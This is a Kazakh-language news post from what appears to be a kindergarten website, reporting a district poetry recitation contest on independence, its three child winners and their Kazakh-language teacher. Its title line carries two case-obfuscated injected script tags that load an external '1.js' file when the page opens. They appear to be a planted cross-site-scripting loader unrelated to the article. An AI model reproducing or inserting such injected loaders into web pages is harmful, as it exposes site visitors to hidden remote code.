"Тәуелсіздік – ел тұғыры" атты аудандық мәнерлеп оқу байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.01.2021

"Рухани жаңғыру" бағдарламасы мен "Мәңгілік ел" жалпыұлттық идеясын жүзеге асыру мақсатында білім бөлімі мектепке дейінгі мекемелер арасында "Тәуелсіздік – ел тұғыры" атты аудандық мәнерлеп оқу байқауын өткізді.

Байқаудың мақсаты: мектеп жасына дейінгі балаларды көркем сөз арқылы туған елінің тарихына деген мақтаныш, құрмет сезімін тәрбиелеу.

Байқау қорытындысы бойынша "Еркежан" балабақшасының тәрбиеленушілеріне жүлделі орындар берілді:

Андреева Ульяна-1 орын, "Мектепке дейінгі ұйымдардың орта топтарының тәрбиеленушілері арасында өлеңдерді Үздік орындаушы"

Мархабат Медина-1 орын, "Мектепке дейінгі ұйымдардың ересек топ тәрбиеленушілері арасында өлеңдерді Үздік орындаушы"

Хамзина Әдия-1 орын, "Мектепке дейінгі ұйымдардың дайындық топтарының тәрбиеленушілері арасында өлеңдерді Үздік орындаушы"

Балабақша ұжымы қазақ тілі мұғалімі Қалмағанбетова Ақмарал Өмірбекқызы мен оның тәрбиеленушілерін жеңісімен құттықтап, шығармашылық жеңістер тілейді.

Просмотров: 306


Пікір қосу



Деректерді қолтаңбаға қосу
Текст